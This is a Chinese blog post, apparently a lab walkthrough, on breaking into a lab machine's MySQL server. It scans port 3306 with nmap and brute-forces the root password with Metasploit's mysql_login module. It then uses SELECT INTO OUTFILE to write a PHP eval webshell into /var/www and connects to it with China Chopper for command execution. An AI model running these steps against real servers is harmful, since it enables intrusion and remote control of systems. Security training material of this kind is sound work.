利用MySQL暴力破解实现远程控制

最新推荐文章于 2024-02-23 10:30:00 发布
最新推荐文章于 2024-02-23 10:30:00 发布
阅读量1.8k 收藏 14
点赞数 2
文章标签: 学习 安全 网络 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xyc_0/article/details/129472446
版权

一、信息收集

利用nmap工具扫描靶机3306端口开启情况

nmap -sV 192.168.180.133 -p 3306

发现靶机开启3306端口,MySQL数据库

二、渗透测试

打开msfconsole渗透测试平台

搜索mysql_login漏洞模块

search mysql_login

使用auxiliary/scanner/mysql/mysql_login漏洞攻击模块

use 0

查看需要配置的参数

show options

设置密码字典

set pass_file /pass.txt

设置目标IP

set rhosts 192.168.180.133

设置爆破用户名

set username root

运行

exploit

成功爆破出密码 P@sswrd

三、远程登录

使用我们爆破出的用户名密码远程登录MySQL数据库

mysql -h 192.168.180.133 -u root -p

登录成功后写入一句话木马到/var/www目录中

select '<?php @eval($_POST[pass]);?>' into outfile '/var/www/shell.php';

写入成功后使用中国菜刀连接

双击进入

连接成功,可看到系统文件及信息

右击也可以打开虚拟终端,执行命令

实验结束

Attach_1
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用Shell脚本实现远程MySQL自动查询
09-10
本篇文章是对利用Shell脚本实现远程MySQL自动查询的方法进行了详细的分析介绍,需要的朋友参考下
渗透测试-暴力破解之hydra
lza20001103的博客
04-18 4101
渗透测试-暴力破解之hydra
Kali系统MSF模块暴力破解MySQL弱口令漏洞
最新发布
wangluoanquan111的博客
02-23 1072
这里特别要注意MySQL需要启动允许远程访问,因为渗透环境是Kali虚拟机访问windows系统安装的MySQL环境,渗透成功的前提是MySQL允许远程访问,因为默认情况下小皮工具搭建的MySQL服务是仅允许本地访问的。攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具。(2)RPORT 3306 是MySQL开启的端口号,默认是3306;
Docker 安装 MySQL实现远程连接教程
09-08
主要介绍了Docker 安装 MySQL实现远程连接的教程,帮助大家更好的理解和使用docker容器,感兴趣的朋友可以了解下
mysql实现自动远程备份一办法
10-01
mysql实现自动远程备份一办法
MySql如何实现远程登录MySql数据库过程解析
09-08
主要介绍了MySql如何实现远程登录MySql数据库过程解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习
弱口令-爆破Mysql
HAKUNAMATATATTA的博客
11-28 1964
mysql弱口令爆破工具 不仅仅是MySQL
第六天 02.mysql数据库的基本操作和密码爆破
qq_56414082的博客
01-02 900
​ 数据库是什么​ 存储数据的仓库,数据是有组织的进行存储。mysql是一种关系数据库管理系统使用工具:phpstudymysql 默认端口 3306。
hydra暴力破解ftp-telnet-mysql-ssh-http
WEB渗透测试 从入门到萌新
10-09 6060
使用此命令,会枚举出网站已经注册的用户名,枚举出用户名之后,就可以通过xmlrpc.php或者后台登录页面进行爆破,对应的防御手段就是禁用掉xmlrpc.php并对后台进行隐藏
MySQL现高危漏洞,可致服务器root权限被窃取
weixin_34192816的博客
07-03 445
上周,一位名叫Dawid Golunski的波兰黑客发现了存在于MySQL中的漏洞:一个远程root代码执行漏洞和一个权限提升漏洞。当时,Golunski只提供了第一个漏洞的poc,但是承诺之后会透露第二个漏洞(CVE-2016-6663)的更多细节。 本周二,Golunski公布了针对两个漏洞的PoC:第一个PoC针对的是之前的高危权限提升漏洞,而另一...
MySQL 0Day漏洞出现 该漏洞可以拿到本地Root权限
weixin_34289454的博客
10-24 383
2016年9月12日, legalhackers.com网站发布了编号为CVE-2016-6662的0day漏洞公告 。由于该漏洞可以获得MySQL服务器的Root权限,且影响MySql5.5、5.6、5.7乃至最新版本,高级威胁预警通告,这意味着该漏洞影响范围比较广,危害严重,利用难度较低,绿盟科技将在7*24小时内部应急跟踪,24小时内完成技术分析、产品升级和防护方案。 该漏洞可以允许攻击者...
mysql 漏洞_【重大漏洞预警】Mysql代码执行漏洞,可本地提权(含exp)
weixin_42165712的博客
01-18 2674
概要Mysql (5.7, 5.6, 和 5.5版本)的所有默认安装配置,包括最新的版本,攻击者可以远程和本地利用该漏洞。该漏洞需要认证访问MYSQL数据库(通过网络连接或者像phpMyAdmin的web接口),以及通过SQL注入利用。攻击者成功利用该漏洞可以以ROOT权限执行代码,完全控制服务器。利用条件:首先你要有一个Mysql低权限用户,仅需有FIle权限(例如:虚拟主机通常会提供,因为需...
MySQL数据库渗透及漏洞利用总结
05-09 4051
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和W...
mysql弱密码爆破及利用方法
m0_75198157的博客
04-08 799
inux kali2021中已经安装了mysql,所以可以在终端中使用mysql命令登录。在windows中,如果安装了mysql,在mysql/bin/mysql.exe。3、利用我们爆破出的用户名和密码,使用mysql客户端登录远程mysql服务器。需要在mysql服务器上开启写入文件的权限。这个变量默认的值是空值,表示不允许写入。
Mysql暴力破解(CVE-2012-2122)
m0_71366428的博客
12-14 415
暴力破解漏洞的产生是由于服务器端没有做限制,导致攻击者可以通过暴力的手段破解所需信息,如用户名、密码、短信验证码等。暴力破解的关键在于字典的大小及字典是否具有针对性,如登录时,需要输入4位数字的短信验证码,那么暴力破解的范围就是0000~9999。
Nmap爆破MySQL弱口令漏洞:解决报错Accounts: No valid accounts found
mooyuan的博客
11-23 3337
nmap工具不仅仅能扫描,也可以暴力破解mysql,ftp,telnet等服务。看到这里不要怀疑,在kali系统中查一下到底支持哪些暴力破解功能,命令如下查询结果为如上查询结果包括mysql、ftp、telnet等多个服务的暴力破解。接下来就以MySQL为例讲一下如何就是用nmap进行暴力破解获取MySQL的弱口令漏洞,以及如何解决windows下小皮工具搭建的MySQL服务无法渗透成功的问题。
安鸾渗透实战平台——暴力破解(Mysql暴力破解 (200分)
weixin_50985113的博客
03-02 2312
漏洞环境 安鸾渗透实战平台——暴力破解(Mysql暴力破解) kali虚拟机 分析题目 1、从图上作者告诉我们要使用MySQL漏洞,最开始没明白是什么意思,去拿MSF的mysql爆破模块去测试了一下,得到密码,拿去使用时出现了问题 提示密码错误: 又试了几次发现每次爆破的密码都不一样 ...
docker部署mysql 实现远程连接的示例代码
12-14
Docker 是一种容器化平台,可以帮助我们快速部署和管理应用程序。下面是一个示例代码,使用 Docker 部署 MySQL实现远程连接。 首先,我们需要创建一个名为 docker-compose.yml 的文件,内容如下: ``` version: '3' services: mysql: image: mysql restart: always environment: MYSQL_ROOT_PASSWORD: example ports: - "3306:3306" ``` 然后,在终端中进入到 docker-compose.yml 文件所在的目录,运行以下命令启动 MySQL 容器: ``` docker-compose up -d ``` 这样就可以在本地启动一个 MySQL 容器,端口映射为 3306。 接下来,我们需要在 MySQL 中创建一个可以远程连接的用户。可以使用以下命令进入 MySQL 容器的 bash 终端: ``` docker exec -it [CONTAINER_ID] /bin/bash ``` 然后使用以下命令登录 MySQL: ``` mysql -u root -p ``` 输入密码后,在 MySQL 中创建一个允许远程连接的用户: ``` CREATE USER 'remote_user'@'%' IDENTIFIED BY 'password'; GRANT ALL PRIVILEGES ON *.* TO 'remote_user'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES; ``` 这样就在 MySQL 中创建了一个允许远程连接的用户。 最后,我们可以使用任何 MySQL 客户端工具,比如 MySQL Workbench 或 Navicat,使用以下连接信息连接到 MySQL 服务器: ``` Host: [DOCKER_HOST_IP] Port: 3306 Username: remote_user Password: password ``` 这样就可以通过 Docker 部署的 MySQL 实现远程连接了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值